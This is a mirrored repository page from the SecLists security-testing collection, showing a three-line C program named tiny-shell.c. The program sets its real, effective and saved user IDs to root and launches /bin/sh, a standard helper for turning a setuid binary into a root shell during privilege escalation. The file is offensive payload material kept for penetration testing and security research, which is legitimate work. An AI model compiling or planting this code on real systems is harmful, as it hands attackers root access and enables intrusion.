mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-12-18 18:51:17 +00:00
3 lines
76 B
C
3 lines
76 B
C
|
|
// $ gcc tiny-shell.c
|
||
|
|
int main(void){setresuid(0, 0, 0);system("/bin/sh");}
|